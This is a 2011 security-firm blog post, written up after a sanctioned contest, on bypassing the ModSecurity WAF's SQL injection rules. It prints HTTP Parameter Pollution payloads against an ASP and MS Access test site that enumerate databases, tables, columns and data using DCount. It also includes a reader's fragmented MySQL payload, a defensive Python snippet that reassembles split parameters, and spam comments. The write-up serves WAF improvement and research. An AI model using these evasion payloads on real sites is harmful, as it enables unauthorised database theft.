Wednesday, July 6, 2011

Positive Research helps to improve Web Application Firewall efficiency

Positive Research, the innovative department of Positive Technologies, has earned the thanks of Trustwave, the developer of the ModSecurity WAF, for its Web Application Firewall research.

On 23 June, Trustwave, developer of the ModSecurity Web Application Firewall, held an open competition to test web application protection tools. Competitors in the SQL Injection Challenge had to bypass the ModSecurity filter rules that block SQL injection attacks.

The testing consisted of two stages. In the first stage, competitors had to exploit an SQL injection to extract data from the databases of the test sites. The second task was harder: the goal was the same, but competitors had to bypass the ModSecurity filter rules without generating any firewall events.

The ModSecurity SQL Injection Challenge attracted a great number of researchers, including experts from Positive Research, the innovative department of Positive Technologies.
Our experts have long been interested in protection tools: back in 2009, Dmitry Evteev, a Positive Research expert, proposed a universal technique for bypassing ModSecurity filtering, and those ideas were taken into account in the design of the new ModSecurity version.

Positive Research experts successfully completed all the tasks and bypassed the restrictions of the ModSecurity WAF running the latest filter rules. The developers intend to use the results to improve the firewall's efficiency.

Alexander Anisimov, Positive Research team leader, remarks: «Web Application Firewall protects most web applications from mass attacks. But our penetration testing clearly shows that an «out of the box» Web Application Firewall is unable to protect systems from a great number of targeted attacks. So we believe the best way is to use WAF to eliminate detected vulnerabilities. The possible solution is to integrate the compliance and vulnerability management system MaxPatrol with the Web Application Firewall ModSecurity».
More details about the competition are available here:


The ModSecurity SQL Injection Challenge, held by the ModSecurity Team, started on 23 June. Participants could enjoy the process, and the organizers got valuable information to improve the ModSecurity WAF rules. The event included two levels: Level 1, Speed Hacking (completed), and Level 2, Filter Evasion (always open). To complete a level, each participant had to exploit one of the web sites protected by the ModSecurity WAF and provide the organizers with the database structure and the contents of certain tables. Test servers of the Acunetix, HP, IBM and Cenzic security scanners acted as the vulnerable web sites.

To complete level 1, the participants had to provide the organizers with the data listed above and the details of how they obtained them; only then did they get access to ModSecurity. That is the Speed Hack itself. So by the evening of 24 June there should have been no uncompleted stages on level 1. But, surprisingly, level 1 was still incomplete for the web sites that had not been hacked by the evening of 24 June. PT Research Team members easily exploited the detected SQL injections that used MS Access. Shortly afterwards the organizers confirmed us as level 1 winners, and level 1 was closed since everything had been hacked. According to the organizers, they processed about 500 solutions, but no one had been able to exploit the SQL injection vulnerability in the MS Access database. We think the reason is its unpopularity =)

Then we tried to solve task 2: exploit an SQL injection while bypassing the up-to-date ModSecurity WAF rules. We decided to use the vulnerability from the first stage: the one on the IBM test site (IIS + ASP + MS Access).

To bypass the WAF we used MS Access operators and a feature of the IIS and ASP combination that allowed us to conduct an HTTP Parameter Pollution (HPP) attack.

We exploited an SQL injection vulnerability in the test site script transaction.asp: the server script does not validate user input sufficiently, which allows an attacker to inject SQL.
Below are the requests that ModSecurity did not detect and that yielded all the data needed to connect to the web site database.

A crafted SQL request that references an explicitly named database is enough to obtain the database name. We used an error-based method with brute force: a request naming a non-existent database makes the web application respond with an MS Access error stating that the database does not exist, so existing databases can be told apart by the response.
Here is an example:

__VIEWSTATE=[skipped]&after=1 and (select 1&after=1 from a.c)&before=2—1

The same method gives the table names in the current database, except that the requests do not include an explicit database name.
Here is an example:

__VIEWSTATE=[skipped]&after=1 and (select 1&after=1 from users1)&before=2—1

Brute force also yields column names, but here we used the error-based method with a "group by + having 1" construct. We conducted an HTTP Parameter Pollution attack to bypass ModSecurity.
Here is an example:

__VIEWSTATE=[skipped]&after=&before=1231 group by 1&before=transid having 1

Getting data out of the database took us rather a lot of time :) The ModSecurity filter blocks almost all useful functions. But we found a solution!
First, we built a statement that lets us detect data in the database. Here is the request:

__VIEWSTATE=[skipped]&after=1 AND (select username from users where username='admin')&before=d

Of course, the WAF detects this statement. To prevent that, we split the request (select username from users where username='user') into several parts.
For example:

__VIEWSTATE=[skipped]&after=1 AND (select mid(last(username)&after=1&after=1) from users where username='admin') &before=d

It works, but the WAF still filters it, specifically "mid(" and similar character sequences. In the MS Access manual we found the DCount function, which lets us exploit the vulnerability while bypassing the WAF. Here is an example:

__VIEWSTATE=[skipped]&after=1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')&before=d

The database contents can then be retrieved by brute force.
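To show why the split requests above slip past per-parameter inspection, here is an added example (not part of the original post and not ModSecurity code) that reassembles repeated query parameters the way classic ASP's Request.QueryString does, joining the occurrences with ", ", and applies one small illustrative SQL pattern before and after merging. The pattern and the sample query strings are constructed for this example; they are not ModSecurity rules.

```python
import re
from urllib.parse import parse_qsl

# Classic ASP's Request.QueryString("name") returns every occurrence of a
# repeated parameter joined with ", ". A WAF that checks each occurrence on
# its own never sees the string the script actually hands to the database.
ASP_JOIN = ", "

# Small illustrative pattern, constructed for this example; it is NOT the
# ModSecurity rule set. It flags a SELECT ... FROM or a GROUP BY ... HAVING
# that appears inside a single parameter value.
SQLI_HINT = re.compile(
    r"\bselect\b.+\bfrom\b|\bgroup\s+by\b.+\bhaving\b", re.IGNORECASE | re.DOTALL
)


def effective_params(query):
    """Merge a raw query string into {name: value} as the ASP script sees it,
    keeping the order in which repeated occurrences arrived."""
    merged = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        merged.setdefault(name, []).append(value)
    return {name: ASP_JOIN.join(values) for name, values in merged.items()}


def inspect(query):
    """Return (hit_per_occurrence, hit_after_merge, merged_params).

    The first flag is what a naive per-occurrence check yields; the second is
    what the same pattern yields once the HPP-split values are reassembled."""
    per_occurrence = any(
        SQLI_HINT.search(value) for _, value in parse_qsl(query, keep_blank_values=True)
    )
    merged = effective_params(query)
    after_merge = any(SQLI_HINT.search(value) for value in merged.values())
    return per_occurrence, after_merge, merged


if __name__ == "__main__":
    # Constructed query strings modelled on the requests in the post.
    samples = [
        "after=1 and (select 1&after=1 from users1)&before=2",
        "after=&before=1231 group by 1&before=transid having 1",
        "after=1&before=2",  # benign request
    ]
    for q in samples:
        per, merged_hit, merged = inspect(q)
        print(f"{q!r}\n  per-occurrence hit: {per}  after merge: {merged_hit}  merged: {merged}")
```

The point for a WAF operator is to normalise repeated parameters into the value the backend will actually receive before applying rules; the join separator is platform-specific, so the normalisation must match the backend in front of which the WAF sits.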

Greets go out to Ahmad Maulana, Travis Lee, Johannes Dahse, Vladimir Vorontsov, Roberto Salgado, SQLMap Developers, HackPlayers, Alexander Zaitsev, Yuri Goltsev.


  1. I used almost the same approach to win this contest.
    Only instead of HPP, a fragmented request was used.

  2. Vladimir, can you show an example of your request to get data from the database and bypass the WAF?

  3. The resulting SQL was about:

    ... WHERE DateTo=''and(select(ord(username),'AND DateTo='from users#

    Payload1: 'and(select(ord(username),
    Payload2: from users#

    Something like that. Approx.
    The main point is not to use extra quotes, and to take those that are already in the query.

  4. Nicely done!

    Miroslav and I (sqlmap developers) focused on the Acunetix application (Apache/PHP/MySQL 5.0) only because HPP had already been fixed by the ModSecurity guys at the time we gave the challenge a go.

  5. Bernardo, thanks! And what about your solution? How did you guys bypass the WAF?

  6. We abused MySQL syntax flexibility as well as its comments. We are going to give out the details on my blog and on the sqlmap mailing list soon.

  7. Excellent pieces. Keep posting this kind of information on your blog. I was really impressed by your blog.
    SEO tools

  8. Lots of useful points are there. It really keeps me updated.
    Vee Eee Technologies